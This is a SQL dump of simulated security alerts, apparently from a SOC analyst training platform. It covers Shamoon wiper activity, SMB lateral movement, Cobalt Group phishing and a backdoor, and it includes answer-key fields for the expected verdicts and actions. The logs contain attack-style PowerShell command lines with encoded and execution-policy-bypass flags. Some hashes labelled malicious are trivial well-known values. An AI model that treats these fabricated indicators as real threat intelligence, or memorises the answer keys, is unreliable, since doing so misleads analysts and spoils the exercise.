2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:45:37Z\\\",\\\"event_id\\\":4657,\\\"user\\\":\\\"admin_user\\\",\\\"computer_name\\\":\\\"compromised-host.internal\\\",\\\"registry_key_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"new_service_name\\\":\\\"WinSecureService\\\",\\\"service_executable\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wiper.exe\\\",\\\"malware_hash\\\":\\\"9b0a1e3d4f5e6a7c8b9d0e1f2c3b4a5d\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"action\\\":\\\"Registry Key Modified, Service Created\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.452Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:45:37Z\\\",\\\"event_id\\\":4657,\\\"user\\\":\\\"admin_user\\\",\\\"computer_name\\\":\\\"compromised-host.internal\\\",\\\"registry_key_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"new_service_name\\\":\\\"WinSecureService\\\",\\\"service_executable\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wiper.exe\\\",\\\"malware_hash\\\":\\\"9b0a1e3d4f5e6a7c8b9d0e1f2c3b4a5d\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"action\\\":\\\"Registry Key Modified, Service Created\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.452Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:45:37Z\\\",\\\"event_id\\\":4657,\\\"user\\\":\\\"admin_user\\\",\\\"computer_name\\\":\\\"compromised-host.internal\\\",\\\"registry_key_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"new_service_name\\\":\\\"WinSecureService\\\",\\\"service_executable\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wiper.exe\\\",\\\"malware_hash\\\":\\\"9b0a1e3d4f5e6a7c8b9d0e1f2c3b4a5d\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"action\\\":\\\"Registry Key Modified, Service Created\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(805, 'Increased Network Traffic and SMB Activity', 'high', 'Network Traffic Analysis', 'Anomalous increase in network traffic detected originating from internal workstation 192.168.1.45 to multiple endpoints within the network. The traffic involves SMB protocol usage consistent with lateral movement techniques aimed at propagating Shamoon malware. The connection was initiated using stolen credentials associated with user jdoe. A known malicious file hash was identified in the traffic.', 'Lateral Movement', 'T1021.002 - SMB/Windows Admin Shares', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:35:22Z\",\"source_ip\":\"192.168.1.45\",\"destination_ips\":[\"192.168.1.50\",\"192.168.1.51\",\"192.168.1.52\"],\"user\":\"jdoe\",\"protocol\":\"SMB\",\"malware_hash\":\"e99a18c428cb38d5f260853678922e03\",\"malicious_file\":\"spreadshamoon.exe\",\"external_attacker_ip\":\"203.0.113.5\",\"activity\":\"Increase in SMB traffic and file transfer attempts using stolen credentials\"}', '2026-01-12 22:17:37', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Source IP of the lateral movement within the network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with previous attacks.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Shamoon malware variant.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"compromised\",\"details\":\"User credentials used in unauthorized 
activities.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"spreadshamoon.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"malicious\",\"details\":\"Executable file used to propagate malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(806, 'MBR Overwrite Detected', 'critical', 'Disk Forensics', 'As the final step, the Shamoon wiper overwrites the MBR of infected systems, rendering them inoperable and displaying a burning American flag image. This operation is indicative of a politically motivated attack aimed at causing maximum disruption.', 'Impact', 'T1561.002 - Disk Structure Wipe', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-05T14:23:39Z\",\"event_source\":\"disk_forensics\",\"event_id\":\"DF-2023-10001\",\"description\":\"Detected overwrite of Master Boot Record on host 192.168.10.45. Associated with Shamoon malware.\",\"host_ip\":\"192.168.10.45\",\"malware_hash\":\"4a5b6c7d8e9f0a1b2c3d4e5f6a7b8c9d\",\"malware_filename\":\"trksvr.exe\",\"attacker_ip\":\"203.0.113.20\",\"user\":\"admin_user\",\"action_taken\":\"MBR Overwrite\",\"political_imagery\":\"burning_flag.png\"}', '2026-01-12 22:17:37', '2026-02-16 18:00:24', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.10.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"4a5b6c7d8e9f0a1b2c3d4e5f6a7b8c9d\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known hash associated with Shamoon malware.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"trksvr.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Executable file used by Shamoon for MBR overwriting.\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"203.0.113.20\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known attacker IP associated with Shamoon 
operations.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'IR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.454Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:39Z\\\",\\\"event_source\\\":\\\"disk_forensics\\\",\\\"event_id\\\":\\\"DF-2023-10001\\\",\\\"description\\\":\\\"Detected overwrite of Master Boot Record on host 192.168.10.45. Associated with Shamoon malware.\\\",\\\"host_ip\\\":\\\"192.168.10.45\\\",\\\"malware_hash\\\":\\\"4a5b6c7d8e9f0a1b2c3d4e5f6a7b8c9d\\\",\\\"malware_filename\\\":\\\"trksvr.exe\\\",\\\"attacker_ip\\\":\\\"203.0.113.20\\\",\\\"user\\\":\\\"admin_user\\\",\\\"action_taken\\\":\\\"MBR Overwrite\\\",\\\"political_imagery\\\":\\\"burning_flag.png\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.454Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:39Z\\\",\\\"event_source\\\":\\\"disk_forensics\\\",\\\"event_id\\\":\\\"DF-2023-10001\\\",\\\"description\\\":\\\"Detected overwrite of Master Boot Record on host 192.168.10.45. 
Associated with Shamoon malware.\\\",\\\"host_ip\\\":\\\"192.168.10.45\\\",\\\"malware_hash\\\":\\\"4a5b6c7d8e9f0a1b2c3d4e5f6a7b8c9d\\\",\\\"malware_filename\\\":\\\"trksvr.exe\\\",\\\"attacker_ip\\\":\\\"203.0.113.20\\\",\\\"user\\\":\\\"admin_user\\\",\\\"action_taken\\\":\\\"MBR Overwrite\\\",\\\"political_imagery\\\":\\\"burning_flag.png\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.454Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:39Z\\\",\\\"event_source\\\":\\\"disk_forensics\\\",\\\"event_id\\\":\\\"DF-2023-10001\\\",\\\"description\\\":\\\"Detected overwrite of Master Boot Record on host 192.168.10.45. Associated with Shamoon malware.\\\",\\\"host_ip\\\":\\\"192.168.10.45\\\",\\\"malware_hash\\\":\\\"4a5b6c7d8e9f0a1b2c3d4e5f6a7b8c9d\\\",\\\"malware_filename\\\":\\\"trksvr.exe\\\",\\\"attacker_ip\\\":\\\"203.0.113.20\\\",\\\"user\\\":\\\"admin_user\\\",\\\"action_taken\\\":\\\"MBR Overwrite\\\",\\\"political_imagery\\\":\\\"burning_flag.png\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.454Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:39Z\\\",\\\"event_source\\\":\\\"disk_forensics\\\",\\\"event_id\\\":\\\"DF-2023-10001\\\",\\\"description\\\":\\\"Detected overwrite of Master Boot Record on host 192.168.10.45. 
Associated with Shamoon malware.\\\",\\\"host_ip\\\":\\\"192.168.10.45\\\",\\\"malware_hash\\\":\\\"4a5b6c7d8e9f0a1b2c3d4e5f6a7b8c9d\\\",\\\"malware_filename\\\":\\\"trksvr.exe\\\",\\\"attacker_ip\\\":\\\"203.0.113.20\\\",\\\"user\\\":\\\"admin_user\\\",\\\"action_taken\\\":\\\"MBR Overwrite\\\",\\\"political_imagery\\\":\\\"burning_flag.png\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.454Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:39Z\\\",\\\"event_source\\\":\\\"disk_forensics\\\",\\\"event_id\\\":\\\"DF-2023-10001\\\",\\\"description\\\":\\\"Detected overwrite of Master Boot Record on host 192.168.10.45. Associated with Shamoon malware.\\\",\\\"host_ip\\\":\\\"192.168.10.45\\\",\\\"malware_hash\\\":\\\"4a5b6c7d8e9f0a1b2c3d4e5f6a7b8c9d\\\",\\\"malware_filename\\\":\\\"trksvr.exe\\\",\\\"attacker_ip\\\":\\\"203.0.113.20\\\",\\\"user\\\":\\\"admin_user\\\",\\\"action_taken\\\":\\\"MBR Overwrite\\\",\\\"political_imagery\\\":\\\"burning_flag.png\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(807, 'Suspicious Login Attempt Detected', 'medium', 'Firewall Logs', 'The Cobalt Group initiated an attack attempt through a phishing campaign targeting bank employees. A suspicious login attempt was detected from an unfamiliar IP address.', 'Initial Access', 'T1566.001 - Spearphishing Attachment', 1, 'new', NULL, '{\"timestamp\":\"2023-10-01T10:15:30Z\",\"event_type\":\"login_attempt\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.5.23\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"username\":\"jdoe\",\"login_result\":\"failed\",\"attempted_filename\":\"invoice_2023.pdf\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"phishing_email_sender\":\"no-reply@fakebank.com\",\"phishing_email_subject\":\"Urgent: Invoice Attached\"}', '2026-01-12 22:20:16', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Bank\'s internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"clean\",\"details\":\"Legitimate employee account\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"invoice_2023.pdf\",\"is_critical\":false,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"suspicious\",\"details\":\"Filename commonly used in phishing attempts\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known 
malware\"}},{\"id\":\"artifact_6\",\"type\":\"email\",\"value\":\"no-reply@fakebank.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Email domain linked to phishing activity\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'novice', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(808, 'Malware Execution Triggered', 'high', 'Endpoint Detection System', 'A custom malware designed to infiltrate ATM management systems has been executed on a compromised endpoint. The malware aims to establish a foothold within the network.', 'Execution', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:32:45Z\",\"event_id\":\"evt-123456\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"destination_port\":4444,\"username\":\"jdoe\",\"process_name\":\"atm_manager.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"event_description\":\"Execution of suspicious process detected\",\"host_name\":\"ATM-Server-01\",\"malware_name\":\"ATMInfiltrator\"}', '2026-01-12 22:20:16', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelFeed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malware distribution campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"InternalRecords\",\"verdict\":\"internal\",\"details\":\"Internal ATM management server\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareDatabase\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to ATMInfiltrator malware\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"atm_manager.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"InternalRecords\",\"verdict\":\"suspicious\",\"details\":\"Unusual process execution detected on ATM management server\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 
'novice', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(809, 'Backdoor Installation Identified', 'high', 'System Integrity Monitoring', 'A backdoor was installed on the compromised system to ensure continued access. This action was detected when an unauthorized remote access tool was found running persistently.', 'Persistence', 'T1059.001', 1, 'new', NULL, '{\"event_time\":\"2023-10-25T14:32:00Z\",\"event_type\":\"file_creation\",\"host_ip\":\"192.168.10.15\",\"external_ip\":\"203.0.113.45\",\"username\":\"compromised_user\",\"file\":{\"path\":\"C:\\\\Windows\\\\System32\\\\\",\"name\":\"backdoor.exe\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"process\":{\"name\":\"powershell.exe\",\"command_line\":\"powershell -ExecutionPolicy Bypass -File C:\\\\Windows\\\\System32\\\\backdoor.exe\"}}', '2026-01-12 22:20:16', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.10.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with APT campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"backdoor.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"File name commonly used by backdoor trojans.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known backdoor malware sample.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Audit\",\"verdict\":\"suspicious\",\"details\":\"User account exhibiting abnormal 
behavior.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'novice', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.457Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_time\\\":\\\"2023-10-25T14:32:00Z\\\",\\\"event_type\\\":\\\"file_creation\\\",\\\"host_ip\\\":\\\"192.168.10.15\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"file\\\":{\\\"path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\\\\",\\\"name\\\":\\\"backdoor.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"},\\\"process\\\":{\\\"name\\\":\\\"powershell.exe\\\",\\\"command_line\\\":\\\"powershell -ExecutionPolicy Bypass -File C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\"}}\"},{\"timestamp\":\"2026-02-01T20:31:22.457Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_time\\\":\\\"2023-10-25T14:32:00Z\\\",\\\"event_type\\\":\\\"file_creation\\\",\\\"host_ip\\\":\\\"192.168.10.15\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"file\\\":{\\\"path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\\\\",\\\"name\\\":\\\"backdoor.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"},\\\"process\\\":{\\\"name\\\":\\\"powershell.exe\\\",\\\"command_line\\\":\\\"powershell -ExecutionPolicy Bypass -File C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\"}}\"},{\"timestamp\":\"2026-02-01T20:30:22.457Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected 
[Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_time\\\":\\\"2023-10-25T14:32:00Z\\\",\\\"event_type\\\":\\\"file_creation\\\",\\\"host_ip\\\":\\\"192.168.10.15\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"file\\\":{\\\"path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\\\\",\\\"name\\\":\\\"backdoor.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"},\\\"process\\\":{\\\"name\\\":\\\"powershell.exe\\\",\\\"command_line\\\":\\\"powershell -ExecutionPolicy Bypass -File C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\"}}\"},{\"timestamp\":\"2026-02-01T20:29:22.457Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_time\\\":\\\"2023-10-25T14:32:00Z\\\",\\\"event_type\\\":\\\"file_creation\\\",\\\"host_ip\\\":\\\"192.168.10.15\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"file\\\":{\\\"path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\\\\",\\\"name\\\":\\\"backdoor.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"},\\\"process\\\":{\\\"name\\\":\\\"powershell.exe\\\",\\\"command_line\\\":\\\"powershell -ExecutionPolicy Bypass -File C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\"}}\"},{\"timestamp\":\"2026-02-01T20:28:22.457Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_time\\\":\\\"2023-10-25T14:32:00Z\\\",\\\"event_type\\\":\\\"file_creation\\\",\\\"host_ip\\\":\\\"192.168.10.15\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"file\\\":{\\\"path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\\\\",\\\"name\\\":\\\"backdoor.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"},\\\"process\\\":{\\\"name\\\":\\\"powershell.exe\\\",\\\"command_line\\\":\\\"powershell -ExecutionPolicy Bypass -File C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\"}}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(810, 'Lateral Movement Detected', 'high', 'Network Traffic Analysis', 'Anomalous network traffic detected indicating potential lateral movement by The Cobalt Group. The group is attempting to navigate through the network aiming at key systems managing ATM operations.', 'Lateral Movement', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:32:00Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.1.3.25\",\"username\":\"atm_admin\",\"protocol\":\"SMB\",\"file_accessed\":\"\\\\\\\\10.1.3.25\\\\C$\\\\Windows\\\\System32\\\\atm_operations.exe\",\"hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"action\":\"File Access\",\"device\":\"192.168.1.15\",\"status\":\"Successful\"}', '2026-01-12 22:20:16', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with Cobalt Group activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.3.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Critical ATM infrastructure server.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":false,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash matches known Cobalt Group malware.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"atm_admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Audit\",\"verdict\":\"suspicious\",\"details\":\"User account used in lateral movement attempts.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 
'novice', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
